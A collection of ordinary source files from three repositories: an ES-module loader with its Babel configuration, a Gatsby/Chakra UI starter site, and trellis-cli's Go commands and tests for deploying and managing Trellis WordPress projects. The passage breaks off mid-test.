TYPE_CJS
} = ENTRY
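// parseLoad() performs a two-phase load: load() first runs with
// moduleState.parsing enabled to parse the request, then, once parsing has
// completed (and non-CJS entries pass validateDeep), load() is invoked again
// to execute the module.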
function parseLoad(request, parent, isMain) {
const { moduleState } = shared
moduleState.parsing = true
moduleState.requireDepth += 1
let entry
try {
entry = load(request, parent, isMain)
  } finally {
    moduleState.parsing = false
  }
try {
entry.updateBindings()
if (entry.state === STATE_PARSING_COMPLETED) {
if (entry.type !== TYPE_CJS) {
validateDeep(entry)
}
load(request, parent, isMain)
}
} finally {
moduleState.requireDepth -= 1
}
return entry
}
export default parseLoad
<|start_filename|>.babel.config.js<|end_filename|>
"use strict"
const arrayRemove = require("./script/array-remove.js")
const babel = require("@babel/core")
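// BabelEqEqEqPlugin rewrites loose equality to strict equality ("==" to "===",
// "!=" to "!==") while leaving comparisons against the null literal untouched,
// preserving the idiomatic `x == null` check for null/undefined.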
function BabelEqEqEqPlugin() {
return {
visitor: {
BinaryExpression({ node }) {
const { operator } = node
if ((operator === "==" ||
operator === "!=") &&
node.left.type !== "NullLiteral" &&
node.right.type !== "NullLiteral") {
node.operator += "="
}
}
}
}
}
function BabelModePlugin({ types }) {
// Based on `isInStrictMode()`.
// Copyright <NAME> and other contributors. Released under MIT license:
// https://github.com/babel/babel/blob/master/packages/babel-traverse/src/path/introspection.js
function isInMode(path) {
const parent = path.find((path) => {
if (path.isClass()) {
return true
}
const isFunc = path.isFunction()
if (! isFunc &&
! path.isProgram()) {
return false
}
const node = isFunc
? path.node.body
: path.node
const { directives } = node
let { length } = directives
while (length--) {
const { value } = directives[length].value
if (value === "use sloppy" ||
value === "use strict") {
return true
}
}
})
return parent !== null
}
function isSimpleParameterList(params) {
return params.every(({ type }) => type === "Identifier")
}
function enterFunction(path) {
const { node } = path
const { directives } = node.body
if (directives &&
isSimpleParameterList(node.params) &&
! isInMode(path)) {
directives.push(types.directive(types.directiveLiteral("use strict")))
}
}
return {
visitor: {
ArrowFunctionExpression: enterFunction,
FunctionDeclaration: enterFunction,
FunctionExpression: enterFunction
}
}
}
function BabelOrderPlugin(plugins) {
return {
visitor: {
Program(path) {
for (const plugin of plugins) {
path.traverse(plugin(babel).visitor)
}
}
}
}
}
function BabelRemoveSloppyPlugin() {
  function enterFunction({ node: { body: { directives } } }) {
arrayRemove(directives, ({ value: { value } }) => value === "use sloppy")
}
return {
visitor: {
ArrowFunctionExpression: enterFunction,
FunctionDeclaration: enterFunction,
FunctionExpression: enterFunction
}
}
}
const isTest = /test/.test(process.env.ESM_ENV)
module.exports = {
env: {
production: {
plugins: [
["transform-remove-console", {
exclude: ["error"]
}],
"transform-remove-debugger"
]
}
},
plugins: [
["@babel/proposal-class-properties", {
loose: true
}],
"@babel/proposal-optional-catch-binding",
["@babel/transform-arrow-functions", {
spec: false
}],
["@babel/transform-block-scoping", {
throwIfClosureRequired: false
}],
["transform-for-of-as-array", {
loose: true
}],
BabelOrderPlugin([
BabelEqEqEqPlugin,
BabelModePlugin,
BabelRemoveSloppyPlugin
])
],
presets: [
["@babel/env", {
debug: isTest,
exclude: [
"transform-async-to-generator",
"transform-for-of",
"transform-function-name"
],
loose: true,
modules: false,
targets: { node: 6 }
}]
],
sourceMaps: false
}
<|start_filename|>test/fixture/scenario/jest-config-globals/jest.config.json<|end_filename|>
{
"globals": {
"JEST_CONFIG_GLOBAL": "JEST_CONFIG_GLOBAL_VALUE"
},
"testEnvironment": "node",
"testURL": "file://",
"transform": {}
}
<|start_filename|>test/fixture/scenario/lab/test.js<|end_filename|>
import assert from "assert"
import { script } from "lab"
import { add } from "../../math/math.esm.js"
const lab = script()
lab.it("test", () => {
assert.strictEqual(add(1, 2), 3)
})
export { lab }
| michaelfig/esm |
<|start_filename|>src/components/header.js<|end_filename|>
import { Box, Flex, Heading, Link, Spacer } from '@chakra-ui/react'
import { Link as GatsbyLink } from 'gatsby'
import PropTypes from 'prop-types'
import React from 'react'
import ThemeToggle from './theme-toggle'
const Header = ({ siteTitle }) => (
<Box as="header" background="rebeccapurple" marginBottom="1.45rem">
<Box as="div" m="0 auto" maxW="960px" p="1.45rem 1.0875rem">
<Flex>
<Heading margin="0">
<Link
as={GatsbyLink}
to="/"
color="white"
_hover={{ textDecor: 'none' }}
>
{siteTitle}
</Link>
</Heading>
<Spacer />
<Box as="div" position="relative">
<ThemeToggle />
</Box>
</Flex>
</Box>
</Box>
)
Header.propTypes = {
siteTitle: PropTypes.string,
}
Header.defaultProps = {
siteTitle: ``,
}
export default Header
<|start_filename|>src/pages/page-2.js<|end_filename|>
import { Heading, Link, Text } from '@chakra-ui/react'
import { Link as GatsbyLink } from 'gatsby'
import React from 'react'
import SEO from '../components/seo'
const SecondPage = () => (
<>
<SEO title="Page two" />
<Heading>Hi from the second page</Heading>
<Text fontSize="xl" my={5}>
Welcome to page 2
</Text>
<Link
as={GatsbyLink}
to="/"
color="purple.500"
fontSize="xl"
textDecor="underline"
>
Go back to the homepage
</Link>
</>
)
export default SecondPage
<|start_filename|>gatsby-ssr.js<|end_filename|>
import { wrapPageElement as wrap } from "./src/woot-wapper"
export const wrapPageElement = wrap
<|start_filename|>src/pages/index.js<|end_filename|>
import { Box, Heading, Link, Text } from '@chakra-ui/react'
import { Link as GatsbyLink } from 'gatsby'
import React from 'react'
import Image from '../components/image'
import SEO from '../components/seo'
const IndexPage = () => (
<>
<SEO title="Home" />
<Heading>Hi people</Heading>
<Text fontSize="xl" my={5}>
Welcome to your new Gatsby site.
</Text>
<Text fontSize="xl" my={5}>
Now go build something great.
</Text>
<Box as="div" maxWidth="300px" marginBottom="1.45rem">
<Image />
</Box>
<Link
as={GatsbyLink}
textDecor="underline"
color="purple.500"
fontSize="xl"
to="/page-2/"
>
Go to page 2
</Link>
<br />
<Link
as={GatsbyLink}
textDecor="underline"
color="purple.500"
fontSize="xl"
to="/using-typescript/"
>
Go to "Using TypeScript"
</Link>
</>
)
export default IndexPage
| molebox/gatsby-starter-chakra-ui |
<|start_filename|>cmd/db_opener_sequel_ace.go<|end_filename|>
package cmd
import (
_ "embed"
"fmt"
"github.com/mitchellh/cli"
"io/ioutil"
"os"
"text/template"
"time"
)
type DBOpenerSequelAce struct {
ui cli.Ui
}
//go:embed files/sequel_ace_spf_template.xml
var sequelAceSpfTemplate string
func (o *DBOpenerSequelAce) Open(c DBCredentials) (err error) {
sequelAceSpf, sequelAceSpfErr := ioutil.TempFile("", "*.spf")
if sequelAceSpfErr != nil {
return fmt.Errorf("Error creating temporary SequelAce SPF file: %s", sequelAceSpfErr)
}
// The SPF file has to be read twice:
// 1. by the OS to open SequelAce
// 2. by SequelAce to get db credentials
	// There is a chance the SPF file gets deleted before SequelAce has read it.
	// We want to delete the SPF file because it contains db credentials in plain text,
	// so we sleep for a while before deleting it.
	// 3 seconds is an arbitrary value; it should be enough for most users.
defer func() {
time.Sleep(3 * time.Second)
os.Remove(sequelAceSpf.Name())
}()
tmpl, tmplErr := template.New("sequelAceSpf").Parse(sequelAceSpfTemplate)
if tmplErr != nil {
return fmt.Errorf("Error templating SequelAce SPF: %s", tmplErr)
}
if err := tmpl.Execute(sequelAceSpf, c); err != nil {
return fmt.Errorf("Error writing SequelAce SPF: %s", err)
}
open := execCommandWithOutput("open", []string{sequelAceSpf.Name()}, o.ui)
if err := open.Run(); err != nil {
return fmt.Errorf("Error opening database with Tableplus: %s", err)
}
return nil
}
<|start_filename|>cmd/vault_edit.go<|end_filename|>
package cmd
import (
"fmt"
"strings"
"github.com/mitchellh/cli"
"github.com/roots/trellis-cli/trellis"
)
type VaultEditCommand struct {
UI cli.Ui
Trellis *trellis.Trellis
}
func (c *VaultEditCommand) Run(args []string) int {
if err := c.Trellis.LoadProject(); err != nil {
c.UI.Error(err.Error())
return 1
}
c.Trellis.CheckVirtualenv(c.UI)
commandArgumentValidator := &CommandArgumentValidator{required: 1, optional: 0}
commandArgumentErr := commandArgumentValidator.validate(args)
if commandArgumentErr != nil {
c.UI.Error(commandArgumentErr.Error())
c.UI.Output(c.Help())
return 1
}
file := args[0]
vaultEdit := execCommand("ansible-vault", []string{"edit", file}, c.UI)
err := vaultEdit.Run()
if err != nil {
c.UI.Error(fmt.Sprintf("Error running ansible-vault: %s", err))
return 1
}
return 0
}
func (c *VaultEditCommand) Synopsis() string {
return "Edit an encrypted file in place"
}
func (c *VaultEditCommand) Help() string {
helpText := `
Usage: trellis vault edit [options] FILE
Edit an encrypted file in place
Trellis docs: https://roots.io/trellis/docs/vault/
Ansible Vault docs: https://docs.ansible.com/ansible/latest/user_guide/vault.html
Edit production file:
$ trellis vault edit group_vars/production/vault.yml
Arguments:
FILE file name to edit
Options:
-h, --help show this help
`
return strings.TrimSpace(helpText)
}
<|start_filename|>trellis/virtualenv.go<|end_filename|>
package trellis
import (
"fmt"
"log"
"os"
"os/exec"
"path/filepath"
"github.com/roots/trellis-cli/github"
)
const TrellisVenvEnvName string = "TRELLIS_VENV"
const VenvEnvName string = "VIRTUAL_ENV"
const PathEnvName string = "PATH"
const OldPathEnvName string = "PRE_TRELLIS_PATH"
const VirtualenvDir string = "virtualenv"
type Virtualenv struct {
Path string
BinPath string
OldPath string
}
func NewVirtualenv(path string) *Virtualenv {
return &Virtualenv{
Path: filepath.Join(path, VirtualenvDir),
BinPath: filepath.Join(path, VirtualenvDir, "bin"),
OldPath: os.Getenv(PathEnvName),
}
}
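// Activate emulates virtualenv's `activate` script: it records the original
// PATH in PRE_TRELLIS_PATH, sets VIRTUAL_ENV, and prepends the virtualenv's
// bin directory to PATH so executables installed there (python, pip, etc.)
// take precedence.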
func (v *Virtualenv) Activate() {
if v.Active() {
return
}
os.Setenv(VenvEnvName, v.Path)
os.Setenv(OldPathEnvName, v.OldPath)
os.Setenv(PathEnvName, fmt.Sprintf("%s:%s", v.BinPath, v.OldPath))
}
func (v *Virtualenv) Active() bool {
return os.Getenv(VenvEnvName) == v.Path
}
func (v *Virtualenv) Create() (err error) {
_, cmd := v.Installed()
cmd.Args = append(cmd.Args, v.Path)
cmd.Stderr = os.Stderr
if v.Initialized() {
v.Activate()
return nil
}
err = cmd.Run()
if err != nil {
return err
}
v.Activate()
return nil
}
func (v *Virtualenv) Deactivate() {
os.Unsetenv(VenvEnvName)
os.Unsetenv(OldPathEnvName)
os.Setenv(PathEnvName, v.OldPath)
}
func (v *Virtualenv) LocalPath() string {
configHome := os.Getenv("XDG_CONFIG_HOME")
if configHome == "" {
homeDir, err := os.UserHomeDir()
if err != nil {
log.Fatal(err)
}
configHome = filepath.Join(homeDir, ".local", "share")
}
return filepath.Join(configHome, "trellis", "virtualenv")
}
func (v *Virtualenv) Initialized() bool {
if _, err := os.Stat(filepath.Join(v.BinPath, "python")); os.IsNotExist(err) {
return false
}
if _, err := os.Stat(filepath.Join(v.BinPath, "pip")); os.IsNotExist(err) {
return false
}
return true
}
func (v *Virtualenv) Install() string {
localPath := v.LocalPath()
configDir := filepath.Dir(localPath)
if _, err := os.Stat(configDir); os.IsNotExist(err) {
if err = os.MkdirAll(configDir, 0755); err != nil {
log.Fatal(err)
}
}
return github.DownloadRelease("pypa/virtualenv", "latest", os.TempDir(), localPath)
}
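// Installed reports whether a way to create virtualenvs is available, checking
// in order: a `virtualenv` executable, `python3 -m venv`, and finally the
// virtualenv.py downloaded by Install() into the local config path. The
// returned cmd is the base command that Create() appends the target path to.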
func (v *Virtualenv) Installed() (ok bool, cmd *exec.Cmd) {
path, err := exec.LookPath("virtualenv")
if err == nil {
return true, exec.Command(path)
}
path, err = exec.LookPath("python3")
if err == nil {
return true, exec.Command(path, "-m", "venv")
}
localVenvPath := filepath.Join(v.LocalPath(), "virtualenv.py")
if _, err = os.Stat(localVenvPath); !os.IsNotExist(err) {
return true, exec.Command("python", localVenvPath)
}
return false, nil
}
<|start_filename|>cmd/dot_env.go<|end_filename|>
package cmd
import (
_ "embed"
"fmt"
"strings"
"github.com/mitchellh/cli"
"github.com/roots/trellis-cli/trellis"
)
type DotEnvCommand struct {
UI cli.Ui
Trellis *trellis.Trellis
playbook PlaybookRunner
}
//go:embed files/playbooks/dot_env_template.yml
var dotenvYmlContent string
func NewDotEnvCommand(ui cli.Ui, trellis *trellis.Trellis) *DotEnvCommand {
playbook := &AdHocPlaybook{
files: map[string]string{
"dotenv.yml": dotenvYmlContent,
},
Playbook: Playbook{
ui: ui,
},
}
return &DotEnvCommand{UI: ui, Trellis: trellis, playbook: playbook}
}
func (c *DotEnvCommand) Run(args []string) int {
if err := c.Trellis.LoadProject(); err != nil {
c.UI.Error(err.Error())
return 1
}
c.Trellis.CheckVirtualenv(c.UI)
commandArgumentValidator := &CommandArgumentValidator{required: 0, optional: 1}
commandArgumentErr := commandArgumentValidator.validate(args)
if commandArgumentErr != nil {
c.UI.Error(commandArgumentErr.Error())
c.UI.Output(c.Help())
return 1
}
environment := "development"
if len(args) == 1 {
environment = args[0]
}
environmentErr := c.Trellis.ValidateEnvironment(environment)
if environmentErr != nil {
c.UI.Error(environmentErr.Error())
return 1
}
c.playbook.SetRoot(c.Trellis.Path)
if err := c.playbook.Run("dotenv.yml", []string{"-e", "env=" + environment}); err != nil {
c.UI.Error(fmt.Sprintf("Error running ansible-playbook: %s", err))
return 1
}
return 0
}
func (c *DotEnvCommand) Synopsis() string {
return "Template .env files to local system"
}
func (c *DotEnvCommand) Help() string {
helpText := `
Usage: trellis dotenv [options] [ENVIRONMENT=development]
Template .env files to local system
Options:
-h, --help show this help
`
return strings.TrimSpace(helpText)
}
<|start_filename|>trellis/trellis_test.go<|end_filename|>
package trellis
import (
"fmt"
"io/ioutil"
"os"
"path/filepath"
"reflect"
"testing"
)
func TestCreateConfigDir(t *testing.T) {
dir, _ := ioutil.TempDir("", "")
defer os.RemoveAll(dir)
configPath := dir + "/testing-trellis-create-config-dir"
trellis := Trellis{
ConfigDir: configPath,
}
trellis.CreateConfigDir()
_, err := os.Stat(configPath)
if err != nil {
t.Error("expected config directory to be created")
}
}
func TestEnvironmentNames(t *testing.T) {
environments := make(map[string]*Config)
// Intentionally not in alphabetical order.
environments["b"] = &Config{}
environments["z"] = &Config{}
environments["a"] = &Config{}
trellis := Trellis{
Environments: environments,
}
actual := trellis.EnvironmentNames()
expected := []string{"a", "b", "z"}
if fmt.Sprintf("%s", actual) != fmt.Sprintf("%s", expected) {
t.Errorf("expected %s got %s", expected, actual)
}
}
func TestValidateEnvironment(t *testing.T) {
environments := make(map[string]*Config)
environments["a"] = &Config{}
trellis := Trellis{
Environments: environments,
}
actual := trellis.ValidateEnvironment("a")
if actual != nil {
t.Errorf("expected nil got %s", actual)
}
}
func TestValidateEnvironmentInvalid(t *testing.T) {
environments := make(map[string]*Config)
environments["a"] = &Config{}
trellis := Trellis{
Environments: environments,
}
actual := trellis.ValidateEnvironment("x")
if actual == nil {
t.Error("expected error got nil", actual)
}
}
func TestSiteNamesFromEnvironment(t *testing.T) {
environments := make(map[string]*Config)
environments["a"] = &Config{
WordPressSites: make(map[string]*Site),
}
environments["a"].WordPressSites["a1"] = &Site{}
environments["a"].WordPressSites["a2"] = &Site{}
environments["a"].WordPressSites["a3"] = &Site{}
trellis := Trellis{
Environments: environments,
}
actual := trellis.SiteNamesFromEnvironment("a")
expected := []string{"a1", "a2", "a3"}
if fmt.Sprintf("%s", actual) != fmt.Sprintf("%s", expected) {
t.Errorf("expected %s got %s", expected, actual)
}
}
func TestFindSiteNameFromEnvironmentDefault(t *testing.T) {
expected := "a1"
environments := make(map[string]*Config)
environments["a"] = &Config{
WordPressSites: make(map[string]*Site),
}
environments["a"].WordPressSites[expected] = &Site{}
trellis := Trellis{
Environments: environments,
}
actual, actualErr := trellis.FindSiteNameFromEnvironment("a", "")
if actual != expected {
t.Errorf("expected %s got %s", expected, actual)
}
if actualErr != nil {
t.Errorf("expected nil got %s", actual)
}
}
func TestFindSiteNameFromEnvironmentDefaultError(t *testing.T) {
environments := make(map[string]*Config)
environments["a"] = &Config{
WordPressSites: make(map[string]*Site),
}
trellis := Trellis{
Environments: environments,
}
actual, actualErr := trellis.FindSiteNameFromEnvironment("a", "")
if actualErr == nil {
t.Error("expected error got nil")
}
if actual != "" {
t.Errorf("expected empty string got %s", actual)
}
}
func TestFindSiteNameFromEnvironmentDefaultErrorMultiple(t *testing.T) {
environments := make(map[string]*Config)
environments["a"] = &Config{
WordPressSites: make(map[string]*Site),
}
environments["a"].WordPressSites["a1"] = &Site{}
environments["a"].WordPressSites["a2"] = &Site{}
trellis := Trellis{
Environments: environments,
}
actual, actualErr := trellis.FindSiteNameFromEnvironment("a", "")
if actualErr == nil {
t.Error("expected error got nil")
}
if actual != "" {
t.Errorf("expected empty string got %s", actual)
}
}
func TestFindSiteNameFromEnvironment(t *testing.T) {
expected := "a1"
environments := make(map[string]*Config)
environments["a"] = &Config{
WordPressSites: make(map[string]*Site),
}
environments["a"].WordPressSites[expected] = &Site{}
trellis := Trellis{
Environments: environments,
}
actual, actualErr := trellis.FindSiteNameFromEnvironment("a", expected)
if actual != expected {
t.Errorf("expected %s got %s", expected, actual)
}
if actualErr != nil {
t.Errorf("expected nil got %s", actual)
}
}
func TestFindSiteNameFromEnvironmentInvalid(t *testing.T) {
environments := make(map[string]*Config)
environments["a"] = &Config{
WordPressSites: make(map[string]*Site),
}
environments["a"].WordPressSites["a1"] = &Site{}
trellis := Trellis{
Environments: environments,
}
actual, actualErr := trellis.FindSiteNameFromEnvironment("a", "not-exist")
if actualErr == nil {
t.Error("expected error got nil")
}
if actual != "" {
t.Errorf("expected empty string got %s", actual)
}
}
func TestSiteFromEnvironmentAndName(t *testing.T) {
expected := &Site{}
environments := make(map[string]*Config)
environments["a"] = &Config{
WordPressSites: make(map[string]*Site),
}
environments["a"].WordPressSites["a1"] = &Site{}
environments["a"].WordPressSites["a2"] = expected
environments["a"].WordPressSites["a3"] = &Site{}
trellis := Trellis{
Environments: environments,
}
actual := trellis.SiteFromEnvironmentAndName("a", "a2")
if actual != expected {
t.Error("expected site not returned")
}
}
func TestActivateProjectForProjects(t *testing.T) {
defer LoadFixtureProject(t)()
tp := NewTrellis()
if !tp.ActivateProject() {
t.Error("expected true")
}
wd, _ := os.Getwd()
if tp.Path != wd {
t.Errorf("expected %s to be %s", tp.Path, wd)
}
}
func TestActivateProjectForNonProjects(t *testing.T) {
tempDir, err := ioutil.TempDir("", "trellis")
if err != nil {
t.Fatalf("err: %s", err)
}
defer TestChdir(t, tempDir)()
defer os.RemoveAll(tempDir)
tp := NewTrellis()
if tp.ActivateProject() {
t.Error("expected false")
}
}
func TestActivateProjectForNonVirtualenvInitializedProjects(t *testing.T) {
defer LoadFixtureProject(t)()
os.RemoveAll(".trellis/virtualenv")
tp := NewTrellis()
if tp.ActivateProject() {
t.Error("expected false")
}
}
func TestLoadProjectForProjects(t *testing.T) {
defer LoadFixtureProject(t)()
tp := NewTrellis()
err := tp.LoadProject()
wd, _ := os.Getwd()
if err != nil {
t.Error("expected LoadProject not to return an error")
}
if tp.Path != wd {
t.Errorf("expected %s to be %s", tp.Path, wd)
}
expectedConfig := &CliConfig{
Open: map[string]string{
"sentry": "https://myapp.sentry.io",
},
}
if !reflect.DeepEqual(tp.CliConfig, expectedConfig) {
t.Errorf("expected config not equal")
}
expectedEnvNames := []string{"development", "production", "valet-link"}
if !reflect.DeepEqual(tp.EnvironmentNames(), expectedEnvNames) {
t.Errorf("expected environment names %s to be %s", tp.EnvironmentNames(), expectedEnvNames)
}
}
func TestLoadCliConfigWhenFileDoesNotExist(t *testing.T) {
tp := NewTrellis()
config := tp.LoadCliConfig()
if config == nil {
t.Error("expected config object")
}
}
func TestLoadCliConfigWhenFileExists(t *testing.T) {
defer LoadFixtureProject(t)()
tp := NewTrellis()
configFilePath := filepath.Join(tp.ConfigPath(), ConfigFile)
configContents := ``
if err := ioutil.WriteFile(configFilePath, []byte(configContents), 0666); err != nil {
t.Fatal(err)
}
config := tp.LoadCliConfig()
if !reflect.DeepEqual(config, &CliConfig{}) {
t.Error("expected open object")
}
}
<|start_filename|>cmd/init.go<|end_filename|>
package cmd
import (
"bytes"
"flag"
"fmt"
"os"
"os/exec"
"strings"
"github.com/mitchellh/cli"
"github.com/roots/trellis-cli/trellis"
)
func NewInitCommand(ui cli.Ui, trellis *trellis.Trellis) *InitCommand {
c := &InitCommand{UI: ui, Trellis: trellis}
c.init()
return c
}
type InitCommand struct {
UI cli.Ui
Trellis *trellis.Trellis
flags *flag.FlagSet
force bool
}
func (c *InitCommand) init() {
c.flags = flag.NewFlagSet("", flag.ContinueOnError)
c.flags.Usage = func() { c.UI.Info(c.Help()) }
c.flags.BoolVar(&c.force, "force", false, "Force initialization by re-creating the virtualenv")
}
func (c *InitCommand) Run(args []string) int {
if err := c.Trellis.LoadProject(); err != nil {
c.UI.Error(err.Error())
return 1
}
if err := c.flags.Parse(args); err != nil {
c.UI.Error(err.Error())
return 1
}
args = c.flags.Args()
commandArgumentValidator := &CommandArgumentValidator{required: 0, optional: 0}
commandArgumentErr := commandArgumentValidator.validate(args)
if commandArgumentErr != nil {
c.UI.Error(commandArgumentErr.Error())
c.UI.Output(c.Help())
return 1
}
if err := c.Trellis.CreateConfigDir(); err != nil {
c.UI.Error(err.Error())
return 1
}
c.UI.Info("Initializing project\n")
if ok, _ := c.Trellis.Virtualenv.Installed(); !ok {
c.UI.Info("virtualenv not found")
spinner := NewSpinner(
SpinnerCfg{
Message: "Installing virtualenv",
FailMessage: "Error installing virtualenv",
},
)
spinner.Start()
c.Trellis.Virtualenv.Install()
spinner.Stop()
}
if c.force {
spinner := NewSpinner(
SpinnerCfg{
Message: "Deleting existing virtualenv",
FailMessage: "Error deleting virtualenv",
},
)
spinner.Start()
err := os.RemoveAll(c.Trellis.Virtualenv.Path)
if err != nil {
spinner.StopFail()
c.UI.Error(err.Error())
return 1
}
spinner.Stop()
}
if !c.Trellis.Virtualenv.Initialized() {
spinner := NewSpinner(
SpinnerCfg{
Message: "Creating virtualenv",
FailMessage: "Error creating virtualenv",
StopMessage: fmt.Sprintf("Created virtualenv (%s)", c.Trellis.Virtualenv.Path),
},
)
spinner.Start()
err := c.Trellis.Virtualenv.Create()
if err != nil {
spinner.StopFail()
c.UI.Error(err.Error())
return 1
}
c.Trellis.VenvInitialized = true
spinner.Stop()
}
spinner := NewSpinner(
SpinnerCfg{
Message: "Installing dependencies (this can take a minute...)",
FailMessage: "Error installing dependencies",
StopMessage: "Installing dependencies",
},
)
spinner.Start()
pipCmd := exec.Command("pip", "install", "-r", "requirements.txt")
errorOutput := &bytes.Buffer{}
pipCmd.Stderr = errorOutput
err := pipCmd.Run()
if err != nil {
spinner.StopFail()
c.UI.Error(errorOutput.String())
return 1
}
spinner.Stop()
return 0
}
func (c *InitCommand) Synopsis() string {
return "Initializes an existing Trellis project"
}
func (c *InitCommand) Help() string {
helpText := `
Usage: trellis init [options]
Initializes an existing Trellis project to be managed by trellis-cli.
The initialization process does three things:
1. installs virtualenv if necessary (see below for details)
2. creates a virtual environment specific to the project to manage dependencies
3. installs dependencies via pip (specified by requirements.txt in your Trellis project)
trellis-cli will attempt to use an already installed method to manage virtualenvs
and only fall back to installing virtualenv if necessary:
1. use the virtualenv command if available
2. if python3 is installed, use its built-in venv module
3. finally, download virtualenv to trellis-cli's local config directory (XDG_CONFIG_HOME or ~/.local/share)
To learn more about virtual environments, see https://docs.python.org/3/tutorial/venv.html
This command is idempotent meaning it can be run multiple times without side-effects.
$ trellis init
Force initialization by re-creating the existing virtualenv
$ trellis init --force
Options:
--force Force init by re-creating the virtualenv
-h, --help show this help
`
return strings.TrimSpace(helpText)
}
<|start_filename|>cmd/spinner.go<|end_filename|>
package cmd
import (
"time"
"github.com/theckman/yacspin"
)
type SpinnerCfg struct {
Message string
FailMessage string
StopMessage string
}
func NewSpinner(config SpinnerCfg) *yacspin.Spinner {
if config.StopMessage == "" {
config.StopMessage = config.Message
}
cfg := yacspin.Config{
Frequency: 100 * time.Millisecond,
CharSet: yacspin.CharSets[14],
Suffix: " ",
Message: config.Message,
SuffixAutoColon: false,
StopCharacter: "✓",
StopColors: []string{"fgGreen"},
StopMessage: config.StopMessage,
StopFailCharacter: "✘",
StopFailColors: []string{"fgRed"},
StopFailMessage: config.FailMessage,
}
spinner, _ := yacspin.New(cfg)
return spinner
}
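// Illustrative usage only, mirroring the pattern used by commands like init;
// the messages below are placeholder values, not part of this package's API:
//
//	spinner := NewSpinner(SpinnerCfg{
//		Message:     "Doing work",
//		FailMessage: "Error doing work",
//	})
//	spinner.Start()
//	// ... do the work; call spinner.StopFail() on error ...
//	spinner.Stop()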
<|start_filename|>cmd/deploy.go<|end_filename|>
package cmd
import (
"flag"
"fmt"
"strings"
"github.com/mitchellh/cli"
"github.com/posener/complete"
"github.com/roots/trellis-cli/trellis"
)
func NewDeployCommand(ui cli.Ui, trellis *trellis.Trellis) *DeployCommand {
c := &DeployCommand{UI: ui, Trellis: trellis, playbook: &Playbook{ui: ui}}
c.init()
return c
}
type DeployCommand struct {
UI cli.Ui
flags *flag.FlagSet
branch string
extraVars string
Trellis *trellis.Trellis
playbook PlaybookRunner
verbose bool
}
func (c *DeployCommand) init() {
c.flags = flag.NewFlagSet("", flag.ContinueOnError)
c.flags.Usage = func() { c.UI.Info(c.Help()) }
c.flags.StringVar(&c.branch, "branch", "", "Optional git branch to deploy which overrides the branch set in your site config (default: master)")
c.flags.StringVar(&c.extraVars, "extra-vars", "", "Additional variables which are passed through to Ansible as 'extra-vars'")
c.flags.BoolVar(&c.verbose, "verbose", false, "Enable Ansible's verbose mode")
}
func (c *DeployCommand) Run(args []string) int {
if err := c.Trellis.LoadProject(); err != nil {
c.UI.Error(err.Error())
return 1
}
c.Trellis.CheckVirtualenv(c.UI)
if err := c.flags.Parse(args); err != nil {
return 1
}
args = c.flags.Args()
commandArgumentValidator := &CommandArgumentValidator{required: 1, optional: 1}
commandArgumentErr := commandArgumentValidator.validate(args)
if commandArgumentErr != nil {
c.UI.Error(commandArgumentErr.Error())
c.UI.Output(c.Help())
return 1
}
environment := args[0]
environmentErr := c.Trellis.ValidateEnvironment(environment)
if environmentErr != nil {
c.UI.Error(environmentErr.Error())
return 1
}
siteNameArg := c.flags.Arg(1)
siteName, siteNameErr := c.Trellis.FindSiteNameFromEnvironment(environment, siteNameArg)
if siteNameErr != nil {
c.UI.Error(siteNameErr.Error())
return 1
}
vars := []string{
fmt.Sprintf("env=%s", environment),
fmt.Sprintf("site=%s", siteName),
}
if c.branch != "" {
vars = append(vars, fmt.Sprintf("branch=%s", c.branch))
}
if c.extraVars != "" {
vars = append(vars, c.extraVars)
}
extraVars := strings.Join(vars, " ")
playbookArgs := []string{"-e", extraVars}
if c.verbose {
// Pass -vvvv as its own ansible-playbook flag; placing it inside the
// --extra-vars string would not enable Ansible's verbose mode.
playbookArgs = append(playbookArgs, "-vvvv")
}
c.playbook.SetRoot(c.Trellis.Path)
if err := c.playbook.Run("deploy.yml", playbookArgs); err != nil {
c.UI.Error(err.Error())
return 1
}
return 0
}
func (c *DeployCommand) Synopsis() string {
return "Deploys a site to the specified environment"
}
func (c *DeployCommand) Help() string {
helpText := `
Usage: trellis deploy [options] ENVIRONMENT [SITE]
Deploys a site to the specified environment.
See https://roots.io/trellis/docs/deploys/ for more information on deploys with Trellis.
Deploy the default site to production:
$ trellis deploy production
Deploy example.com site to production:
$ trellis deploy production example.com
Deploy a site to production with a different git branch:
$ trellis deploy --branch=feature-123 production example.com
Arguments:
ENVIRONMENT Name of environment (ie: production)
SITE Name of the site (ie: example.com)
Options:
--branch Optional git branch to deploy which overrides the branch set in your site config (default: master)
--extra-vars (multiple) set additional variables as key=value or YAML/JSON, if filename prepend with @
--verbose Enable Ansible's verbose mode
-h, --help show this help
`
return strings.TrimSpace(helpText)
}
func (c *DeployCommand) AutocompleteArgs() complete.Predictor {
return c.Trellis.AutocompleteSite()
}
func (c *DeployCommand) AutocompleteFlags() complete.Flags {
return complete.Flags{
"--branch": complete.PredictNothing,
"--extra-vars": complete.PredictNothing,
"--verbose": complete.PredictNothing,
}
}
<|start_filename|>trellis/complete_test.go<|end_filename|>
package trellis
import (
"bytes"
"io"
"os"
"reflect"
"sort"
"strings"
"testing"
"github.com/mitchellh/cli"
"github.com/posener/complete"
)
// Tests based on
// https://github.com/mitchellh/cli/blob/5454ffe87bc5c6d8b6b21c825617755e18a07828/cli_test.go#L1125-L1225
// envComplete is the env var that the complete library sets to specify
// it should be calculating an auto-completion.
const envComplete = "COMP_LINE"
func TestCompletionFunctions(t *testing.T) {
trellis := NewTrellis()
defer TestChdir(t, "testdata/trellis")()
if err := trellis.LoadProject(); err != nil {
t.Fatalf(err.Error())
}
cases := []struct {
Predictor complete.Predictor
Completed []string
Last string
Expected []string
}{
{trellis.AutocompleteEnvironment(), []string{"deploy"}, "", []string{"development", "valet-link", "production"}},
{trellis.AutocompleteEnvironment(), []string{"deploy"}, "d", []string{"development"}},
{trellis.AutocompleteEnvironment(), []string{"deploy", "production"}, "", nil},
{trellis.AutocompleteSite(), []string{"deploy"}, "", []string{"development", "valet-link", "production"}},
{trellis.AutocompleteSite(), []string{"deploy"}, "d", []string{"development"}},
{trellis.AutocompleteSite(), []string{"deploy", "production"}, "", []string{"example.com"}},
}
for _, tc := range cases {
t.Run(tc.Last, func(t *testing.T) {
command := new(cli.MockCommandAutocomplete)
command.AutocompleteArgsValue = tc.Predictor
cli := &cli.CLI{
Commands: map[string]cli.CommandFactory{
"deploy": func() (cli.Command, error) { return command, nil },
},
Autocomplete: true,
}
// Setup the autocomplete line
var input bytes.Buffer
input.WriteString("cli ")
if len(tc.Completed) > 0 {
input.WriteString(strings.Join(tc.Completed, " "))
input.WriteString(" ")
}
